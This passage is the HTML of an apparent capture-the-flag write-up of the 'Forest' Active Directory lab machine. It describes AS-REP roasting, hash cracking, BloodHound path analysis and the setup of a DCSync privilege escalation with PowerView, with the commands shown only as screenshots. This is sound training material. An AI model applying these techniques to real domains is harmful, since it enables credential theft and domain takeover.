/static/ce945090632cc6e6d4d48cc5c102ecb5/14945/nmap-scan.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> </ul> <p>Active Directory:</p> <ul> <li>domain name: htb.local</li> <li>hostname: FOREST</li> </ul> <p>I attempted an anonymous LDAP bind with <code class="language-text">crackmapexec</code> which allowed me to view users on the system:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6aa7f9e4241d040a851b2d0beb4591dd/c16d6/crackmapexec-enum-users.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.24050632911393%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAADaElEQVR42lWU6XbaSBSEeZMEg8AYIbT1on1DGPBCiIntZJZ4zvHMnHn/B6ipbrCT/KjD0q2v69a9rYEjNhjrI8bpEctsi/XtE9rtF/T8TNs7zIIcF1cSYy/FeFnAcROrySLF1DPKMF0apfwvwcBND/BkC1nukDR3yLt7+LpHnF4jTNYouj18rs+jGmF94CF7iGKLeVhauVFF1Xb9MigwmOTf4cwT+KJGtbpH0d7C46Y47RElPdrNA8Z0ZOQTVNQb5OX6dEhIWFxjERHsSUyuBAZJeQ8RCBQqwe1qhW3TIJcKbZpiU2gc+hLa9zCaCeQihgwFFp7A5Fz6iGYWvkatBMJAYqDyGyhuahKFvqrRlxWSWEGJDDkPWZUlQteFM11Cx5ISiLl/5kpmq6ymruIzAr5vgMxLhzFqrdDkFVUiEwreMrFRuEGJD06E4SRiJRH/F/h4qTCcqV+AKhKIjEO/eIa7UBCiQNdt0VRsSJRB6ZY5rZjpnuVqjKY8NJpjpxe4T108FC6NhARzjdA3DUblfxhONRZhjWZ9RNU9wA07xNkOMt+hv3mmuxijSYD7MsTLOsDrZol/r120sWvdj+c/oINJ9oIRS1ga4OozyvZAeINIm7G5tocMnZAuY9wUMZ7bEE/U1y5EpWJ8GPt27R3o6N8tcBFUyOs90vIOrt8gUGurkodY4GWALpV4qCM8EnioQhRS2CzHnIAfwOyVmzUdNmj6B5ZsHLacww1EusVq94SLqcTIWWKbevjW+nRpFKCU8SnDn0t2in9wYYBRg47l1QR6BBqYUbd95LpxoXDIFvirneNrNcdLe8UmmQzDs0N9BqanDD1mWK8Otqs2Q8UMqbo/noB8YJcxwzrEkfqNGRZxhI9OwIaZSMQZmPzxnmHR7JFVzDCoEck1QqrqPrNk41DjOo1xLCN8KtiYJuS8Spvh6DKi2JgZ59DJ/z5lyJLb3pT8iW4byGQDyRzX2yfOoIJD4D6P8Ccb8kzYSx+g4FUc8lnrbvbmMH89jY0B2jk8AQWBRqvNFwKlPfSWJX9juSlvRegLXJnrZxzO5E8lp99/ybC0GbJkvUbMsWnZeQMcc89aR8h4j12Chvx9gr1JnoHy0QJdvjx1wRcFX7LzZQk/7qyy8vYdWLPEq7nERxvBCTQ+y36fa/wPaU1PHhzWUW8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec enumerate users" title="" src="/static/6aa7f9e4241d040a851b2d0beb4591dd/50637/crackmapexec-enum-users.png" srcset="/static/6aa7f9e4241d040a851b2d0beb4591dd/dda05/crackmapexec-enum-users.png 158w, /static/6aa7f9e4241d040a851b2d0beb4591dd/679a3/crackmapexec-enum-users.png 315w, /static/6aa7f9e4241d040a851b2d0beb4591dd/50637/crackmapexec-enum-users.png 630w, /static/6aa7f9e4241d040a851b2d0beb4591dd/c16d6/crackmapexec-enum-users.png 754w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I created a list of users and ran <code class="language-text">GetNPUsers.py</code> from <a href="https://github.com/fortra/impacket" target="_blank">Impacket</a> to see if any accounts were vulnerable to AS-REP-Roasting.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 343px; " > <a class="gatsby-resp-image-link" href="/static/d7da0ac023da7908f9c1e467565807ac/1d916/users-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABEklEQVR42p2Q207CQBRF+yEq9t6CCr3PVFpq7y1FxYBaMCZ+gP//uJ1OjCExMcLDymQmJ+vM3oJux1DdClrYQyZvsO4+QJefmC3eQdIH+PMWTbdDs9qhWvZoV3tO3fXIqi1q9jZP15BNCsUgECbTCE78giltYYUNmnaDonoCCUsk2Ro3doJzcYZLxcGIMZwXkoWRbP/cRcXlMi50gxJV84ycbYvTR5jXEc6YQFQ9NuxC0n2oYwLV/BvFCDiC5WWgUYcouecRbD+HRyvoY8oHDof/g+AEOfJ6AycowOOz+7BE+xYeixDc1qzgV9bVgvchaT7DO0nGhS4p2A+3LGYJWfd+dXK00LiiPKo+GSL6B5wm/AKvZf3tStNkdwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="users list" title="" src="/static/d7da0ac023da7908f9c1e467565807ac/1d916/users-txt.png" srcset="/static/d7da0ac023da7908f9c1e467565807ac/dda05/users-txt.png 158w, /static/d7da0ac023da7908f9c1e467565807ac/679a3/users-txt.png 315w, /static/d7da0ac023da7908f9c1e467565807ac/1d916/users-txt.png 343w" sizes="(max-width: 343px) 100vw, 343px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7a564a18ff9aafec48c7bfe36692defa/9fe72/GetNPUsers.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABfElEQVR42kVR7ZKiMBDkUa7W9RbQBRQBQRBJIIAo3vmxurr3/o/R28S7uh9dSWameyY9hp1eYWUPmIsGeXXGtv+CbK/I6jOifI/ZUsHxBUw3hTnP4IUCy5XC1IsxmgaYMDbkXqwQIzuC4QWShBwuSe+zDeZhBWcu4CwkyRWirIPLGjcsMae4x9OLSkzJeXnz8Wr6GJkLLTjASNY7pJwk2+wx3OO047nXKJsrhLqgUGfiomOT2Ro/pwlMJ4XtZrDeY1hOAotTvjkrGLvDF9r9neQL6u4THd91d+P7A83ugfYv6u7O3B9U3RWStbJlvn+whk2bI+r+jqTYwajol9qyiFOo7Q0NRQfxioLDdLLmhOURqr3phoqCZXtBrk4o6PNa/kImegjGwrSBkRUH/ZVcHJBuen79gFz+hqhOWlSSJEheM+8vKwyeu4HAeMKlWNET9n8Y0apBlDRIaH4Q1xpxusXQqChPWryg+HLVwqZvP8Y+lxFoodd/ghrPLX8DD7zyXZWfc3cAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GetNPUsers" title="" src="/static/7a564a18ff9aafec48c7bfe36692defa/50637/GetNPUsers.png" srcset="/static/7a564a18ff9aafec48c7bfe36692defa/dda05/GetNPUsers.png 158w, /static/7a564a18ff9aafec48c7bfe36692defa/679a3/GetNPUsers.png 315w, /static/7a564a18ff9aafec48c7bfe36692defa/50637/GetNPUsers.png 630w, /static/7a564a18ff9aafec48c7bfe36692defa/9fe72/GetNPUsers.png 755w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As shown in the output above, <code class="language-text">svc-alfresco</code> was the only user with the <code class="language-text">UF_DONT_REQUIRE_PREAUTH</code> flag set (meaning that Kerberos pre-authentication wasn't required), resulting in the retrieval of the AS-REP message with a TGT that has been encrypted with the user's NTLM password hash. So I saved the TGT in a file called <code class="language-text">hash.txt</code> and cracked it with <code class="language-text">JtR</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/39060409cfd0295430ca6e9c88140f66/5458a/hash-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA50lEQVR42kWQ3XKCMBSEeRetTmsdxaEKQhJCQhSQH0G0F33/19gu9KIXO3vmbM7ON/HWXw0C/YN9VOIYF4hVi1h3OKsa2yDDYn3AcnPC22f0r02IxcrH8j3AantmHs77yb3UjXDVN3Q+QGZ3KEs3dyS6hcp7iLSEdD1nZvTEtrNiXUOZGtJ2EJTMO/gnA8+4AdkkFtriBXN9Ql9GaPegRkhdIrv0sBWz8slSvi2YX4d5J037NzM7hDk8kTYQpJFZh3SiowsSphOxJaFuECWOxRWPa5LfSHfjscHuaPgtGjuS+aHFx17gF1QvjGd5FmZIAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Kerberos hash" title="" src="/static/39060409cfd0295430ca6e9c88140f66/50637/hash-txt.png" srcset="/static/39060409cfd0295430ca6e9c88140f66/dda05/hash-txt.png 158w, /static/39060409cfd0295430ca6e9c88140f66/679a3/hash-txt.png 315w, /static/39060409cfd0295430ca6e9c88140f66/50637/hash-txt.png 630w, /static/39060409cfd0295430ca6e9c88140f66/5458a/hash-txt.png 758w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/84e54906d3dfac0232efb06f64dad34f/ee7ce/cracked-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.848101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABTUlEQVR42i2QWZLbMBBDdZRoxrKtfd8okdrlVGrKjpNMPnL/e7y0lXygUA02CYDWufpOYv6Qqjvt8IG5fdKvT/T+i2q6c4o1TtzzHije/ZpT2AiX2OeUL28BtpNgXwre3OqANe6/mdYfzPsnen6glyfj9hM1PsjUV+J6IygmkuZGXK2E5UxULaKvRMVIkhviwuBnmqicsPT0QOlvDPJQN94x85O82mVp5RJoQc9ZcAk1V2Ev0pz9FsdvcCS149U4bsnpBdGstp2JM3EqFlS3MZoNrRbqeqZTK7rfMHqnk7OseqVa8BLDyWvESImhEoOaa9wJekko/9YPd4pmp5B6udTJ5WImnBYzWblQyJxXG6XUTmTOmu3gvN3x04Eg1Uf9uJqxXktle0OZD+J8xg3/1QqSAVfYDbtD82UOYkMkbV4JvdQcbF/K/yiwryV/Abw4xOMOj2qjAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cracked hash" title="" src="/static/84e54906d3dfac0232efb06f64dad34f/50637/cracked-hash.png" srcset="/static/84e54906d3dfac0232efb06f64dad34f/dda05/cracked-hash.png 158w, /static/84e54906d3dfac0232efb06f64dad34f/679a3/cracked-hash.png 315w, /static/84e54906d3dfac0232efb06f64dad34f/50637/cracked-hash.png 630w, /static/84e54906d3dfac0232efb06f64dad34f/ee7ce/cracked-hash.png 756w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I confirmed the creds worked by making a connection with <code class="language-text">evil-winrm</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/9a07d/user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.32911392405063%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB90lEQVR42m2S23abMBRE+ZM2YIubAAkkBAGMDb4nbdfq///LdMBukoc87CUhpNGcOfKEniDMGzbVHZEe0Y3v2M1/0e5/wXY3KHdCqnpsEwOZGSRphZ9bBV+QuIafNMR94EXZiJDEOUe5QxD32EQWQWjhRzUED4Wx5p4G0ZNQLuslRFis81C6FZFScLQG19ZgchazM7i9Glz4PTcGe1fj2hToygJZ4aCURaktKqJUjUppWKUea6Vd/3uZHJHRmSRZOkLJA8saEKf9Spp0iOg25Fws69mOjHT6GBOei1YGuuzhpXKCTGeKzpD5Ebm6IeIosj1EPiEspjWStfTEMg6DgGxizpnZJm1Jw/kDz1QTrD6gd0fUzRGZuSA3Z44n5PUFur2jcDdk3JdpZhwa+GEJf2nMtuB3iSCpiVvxDG9uBTNk94Z2QLv7jba/w5FmeIcb3tBPf2Ber2xY8wndBGyeLzRFK649RL2EnVRJi4odKlSHsj5DmRnaHskJpaPL+sQYBgrQRfxkdcQn84zgQ9APa8hyj1TvGXIPqZaAOyTrfERRzWxIhx+bpdQvgv+hoSA2nyVrO2O73CyWwB0SOlnclTUbQ+cvW8PsDjCOufLhLwKb70S/CkbydV3M6NK2LJElt8xuEff5ZNJiB9OcUfKicNkbf+P0KfgPrHFaWUAdYbgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user flag" title="" src="/static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/50637/user-flag.png" srcset="/static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/dda05/user-flag.png 158w, /static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/679a3/user-flag.png 315w, /static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/50637/user-flag.png 630w, /static/cc4ae1c6ad9a4bb7c3a89377a7350d5d/9a07d/user-flag.png 749w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the valid credentials I was able to authenticate and collect AD data with <code class="language-text">bloodhound-python</code> to do some further enumeration:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/77ac0ebeb539ec22bfc04c90453f5a83/d0595/bloodhound-python.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 69.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACeElEQVR42kVT23aiQBDkUxIvKCAoIgzITQS8xMTE5CR79v8/pLa60exDnRmnnerqqsGaxT3s7Q/G5gbHHJHt35H3H4qsvaI9f6O//EHJ3+u0gbc08Fcppn7Gfaa/7WUOf8PauoaV7V5hiiPi7QFxfsIqaRHEDeZhibGXYuwajJwEz8TYiWF7RjHh+dQbMOH/potMYe0On9gdP6niB3X3jrq/oew+EBcnhSnPSOsL/KjGaB4PDYjH+rtnQ4FVNFfkuzdseakiUVq9wKO6VbKHG1ZDd1F6VzgW0vmGiO7YDDV3mMbK61dkJCk4eko1RfMGw9GjtKMNtCI76LoIqXD2ICRmkWJkr4mVQoitmqqq9h3l/oqKgaxNB29VwV/vsOAacA1otk2VIyXZDKCy0YNwSsJJoI2UUEHSur0hjPcsMAQ7IjaKpyn3VDdxjNZ0TCH7JZcz+miHHPnuX8FVkHA8n+N5yxIu4QSljitqRcFAEivB2En/g2eiVD0UopLe1fIGazaoXrHvv9hIntRZyQQTIZmnXDNdR3N5PvxNwmcZm6FZ57e/2HU3HVdIxceyGcav2w+tSZMwbhnQEatNi8jIuz3zoR8Q8Wyd9nB9vs8gp4ckMFmHhKlKunJx7udwgwIeEWg4NRyeiQ3eUgLjVxE2CKI9Fqx7rLuLhGcFLJseTVdHTJY9D2rE7LoxvWLJCyEVrZMOEeGwwfM0Vjw9YDPAWTIEyKStqLwiruQ7fdGLaX6G2Z6UULysmruv5UXr80XOsTvueyps+QU1iplfaFBWxfd3OH0xkCt2vFzystGkK/WxO36rpwJpICMLqeOXmC0K2NwLJm6maf8DlV7IJecFtNMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="bloodhound-python data" title="" src="/static/77ac0ebeb539ec22bfc04c90453f5a83/50637/bloodhound-python.png" srcset="/static/77ac0ebeb539ec22bfc04c90453f5a83/dda05/bloodhound-python.png 158w, /static/77ac0ebeb539ec22bfc04c90453f5a83/679a3/bloodhound-python.png 315w, /static/77ac0ebeb539ec22bfc04c90453f5a83/50637/bloodhound-python.png 630w, /static/77ac0ebeb539ec22bfc04c90453f5a83/d0595/bloodhound-python.png 753w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After importing the data into <code class="language-text">bloodhound</code>, viewing reachable high value targets for <code class="language-text">svc-alfresco</code> showed that the user was a member of the Account Operators group due to nested group membership (Service Accounts → Privileged IT Accounts → Account Operators):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6a0b9cb88e5419cc77c6d03a4887b1e3/1dfd4/svc-alfresco-reachable-high-value-targets.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 69.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABe0lEQVR42p1T13KDQBDje2Kwjen4CuVoLsk4+f9vUXQH9kx67IedPQZOq5WEJ8wZzXSBOb6hZi+bI/btCc3hFUU9YZ2qX8uPJba5RipzBImC99eFnyqIhetFNWJXNjxL9/wQ4Ipgm6KC6s5k1pGZvL27C9Be9NmTVKA3E3b7Fqto/+GbfwFuMquVoFYVUtUjZ2lzhDAnhGTqGGYLoJtKYW0PEuGE9eMZwHc6SbLQ1KlFNTwjYrcrP5FZRO32zcENWi8Y3k41KNoJoqW7dDgRGnpQkHRfksGuNKiHFPU4Ery66bXJ9HxmhQQOuxGC4N661IgobMgpsTB0rSeQ7RMSaZDrkZEy6M+Xxc3vJNGImwERNfXWiY3AdWV5W3lef2azisiYjtoB/hKXL3Vd+R6XZWdNqD/E5HN590QmFi3yanDnzXXdRwHn30w4Hbd5TRmYgmROgpUpeARwZqoIKpGpOZOp6lxswkI8BhgLm4Kark9Q/Qsy3btwJ6JwgO8iyc/HNzpHawAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc-alfresco reachable high value targets" title="" src="/static/6a0b9cb88e5419cc77c6d03a4887b1e3/50637/svc-alfresco-reachable-high-value-targets.png" srcset="/static/6a0b9cb88e5419cc77c6d03a4887b1e3/dda05/svc-alfresco-reachable-high-value-targets.png 158w, /static/6a0b9cb88e5419cc77c6d03a4887b1e3/679a3/svc-alfresco-reachable-high-value-targets.png 315w, /static/6a0b9cb88e5419cc77c6d03a4887b1e3/50637/svc-alfresco-reachable-high-value-targets.png 630w, /static/6a0b9cb88e5419cc77c6d03a4887b1e3/fddb0/svc-alfresco-reachable-high-value-targets.png 945w, /static/6a0b9cb88e5419cc77c6d03a4887b1e3/f46b1/svc-alfresco-reachable-high-value-targets.png 1260w, /static/6a0b9cb88e5419cc77c6d03a4887b1e3/1dfd4/svc-alfresco-reachable-high-value-targets.png 1264w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Members of the Account Operators group have a certain level of administrative rights. As stated on the <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#account-operators" target="_blank">Microsoft Docs</a>:</p> <blockquote> <p>The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including accounts for users, Local groups, and Global groups. Group members can log in locally to domain controllers.</p> </blockquote> <p>As shown below, Account Operators had GenericAll on the Exchange Windows Permissions group which had WriteDacl on the domain, as a result, members of this group could grant themselves any privileges on the HTB.LOCAL object.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/35cdaa6fba35255602cebb6fe7edfc62/99209/account-operators-reachable-high-value-targets.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 77.84810126582278%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVR42o1Uy3KbQBDU56QiCQvzEIjXLiBWAoGRbFWcU6qSYyr/f+zMTAS2ZaP40MWy7Pb09Mwws/wUU1h6yQjLj8d9O9S432jcrTMs6NvCjS5nUsxuEfJFNyrgRDnaJwf7/hFVe0Z9fMa2eUSod/DSChs3gKl75PVpmpAjrtMtivoIvXsgHJDveyjT0X4l31lhXDbItgdkVQs3LqcJF25MaeV0qKB1grkTEyLBkN5wbn4B778npKhf6ZIiVRzV8v9dZjUDru/I/mX9hpA3OVLCaVTdGyWfxWwgWnqkzE7Jq04Iv9ihpPriqbqpciRkFXOHKhq4OD5rmO4bvKRERuZHeS2VZgIv9og0Fs8W0koThOusovR6aGPw488vfP/5m1riJNWsujN52UuVTbejZy9IyVuH2ukjS2arQIkKO8yxdDMh4vZgJazMvnxfBbk0M2NQPenhS7VSaYt1ZlA2R2kbJn43Of8rynULMKlPzcupvg52fe5ThMNhVrYKFQJlwLZwF4xKpaGT0cO7V+pvzvKcht6iajKhE4VkgaK1loJ4NGbiLQcPyWuad2dTTBPeU5F4Zn1BiYezj+Z0lp+DoerzjDOxQz5b7QG6f4Lath8TsnSe4bhopMmjoiYc5J3XodqNBWP1kd7Lj4Hf/wI0nBhJdIWvFgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="account operators reachable high value targets" title="" src="/static/35cdaa6fba35255602cebb6fe7edfc62/50637/account-operators-reachable-high-value-targets.png" srcset="/static/35cdaa6fba35255602cebb6fe7edfc62/dda05/account-operators-reachable-high-value-targets.png 158w, /static/35cdaa6fba35255602cebb6fe7edfc62/679a3/account-operators-reachable-high-value-targets.png 315w, /static/35cdaa6fba35255602cebb6fe7edfc62/50637/account-operators-reachable-high-value-targets.png 630w, /static/35cdaa6fba35255602cebb6fe7edfc62/99209/account-operators-reachable-high-value-targets.png 827w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used the WriteDacl Windows abuse info provided in <code class="language-text">bloodhound</code> as a guide to run a DCSync attack. Although, I had to make some modifications to make it work properly.</p> <p>Privilege escalation consisted of the following steps:</p> <p>Since I needed the <code class="language-text">Add-DomainObjectAcl</code> cmdlet from PowerView for one of the final steps to grant the user DCSync permission, I started a local python server which contained <code class="language-text">PowerView.ps1</code> from <a href="https://github.com/PowerShellMafia/PowerSploit" target="_blank">PowerSploit</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; " > <a class="gatsby-resp-image-link" href="/static/88eb37e7d6378854c2fa0aa36800061f/bc282/python-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABF0lEQVR42m2Q6W6DMBAGeZaCY46QiyMcxkBiyFGaQoLUqu//Hl8XSqK06o/RypYY76DN3ARs08DYdDC8HsaqwsIvsT/02FVX7Ooe1ekDpbpClu8o9h2cdQ6dhzDMCPod6wfNjI8wsw48UJj5CsxNwe0I9kIQ2Yjliol0nMyOSbb9LTTvwkSR8AieEOkZxjwFs0LYSwFznoxCd13AWcqHnNGHd+HfLTXdoWSvBfMp17uBezVCccTh/IlT84U9JeeUmRUXJNkrBE17JfEyC0apzicmqSbVDYFssc0vJDrDT2qI/I1oUKgOflSPbKlgE6oH4XiuIHctgvgA7gxlMTQhG+jMAxt+8vAqTZ0HD4YthsRnDOufu2nDb2y4wc0/fXwVAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="python server" title="" src="/static/88eb37e7d6378854c2fa0aa36800061f/bc282/python-server.png" srcset="/static/88eb37e7d6378854c2fa0aa36800061f/dda05/python-server.png 158w, /static/88eb37e7d6378854c2fa0aa36800061f/679a3/python-server.png 315w, /static/88eb37e7d6378854c2fa0aa36800061f/bc282/python-server.png 512w" sizes="(max-width: 512px) 100vw, 512px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded it onto the target machine and imported the script into the current session:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4f3676908c203c42d40aec683e32414c/15d18/download-powerview.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 6.329113924050632%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAATklEQVR42h3DAQpAMBiAUfehNIus9hvbLFpLSO5/kk959apRO5yeiYNgxSPrhfUFsxRcOlm2GwkHo8uE/SHlF4kH2qy0/UzTTTRK/rUSPnhmIrtYui1xAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download PowerView" title="" src="/static/4f3676908c203c42d40aec683e32414c/50637/download-powerview.png" srcset="/static/4f3676908c203c42d40aec683e32414c/dda05/download-powerview.png 158w, /static/4f3676908c203c42d40aec683e32414c/679a3/download-powerview.png 315w, /static/4f3676908c203c42d40aec683e32414c/50637/download-powerview.png 630w, /static/4f3676908c203c42d40aec683e32414c/15d18/download-powerview.png 752w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Created a new user (<code class="language-text">user1</code>) and added the account to the Exchange Windows Permissions group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2557db04fa8bfb413e067a7ecaac7f39/adb42/create-user-add-to-group.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA60lEQVR42nWQWVLDMBBEfZUkVMq7LVuSJduR1ySQAPe/TdMyEOCDj67pmRq9nlJQihMaNaOVDsYO0P0zVP+Cxt1QtxfkakImJyT1wDpu8rNCjUgrh4xz76OiRZi3CCoO7QYcYLoF7fQO/QsmzBmFnjdf2TNqe4Fo1q0vm4VAxzqjNivBE4GiR0WyVbywW2HGN0jCEgalTPcP03pELNzjQt8XetmCkuqEzF9Khbkl0Cw4RBL7o8CO2of0kcYuVD/1j9cP/7njJclQeIo1AuNeYdwdqrsiZkJadkj4r8fUcrHBIf5HyZcI+ZYHfgCuR6ApxNqXMQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="create user and add to Exchange Windows Permissions group" title="" src="/static/2557db04fa8bfb413e067a7ecaac7f39/50637/create-user-add-to-group.png" 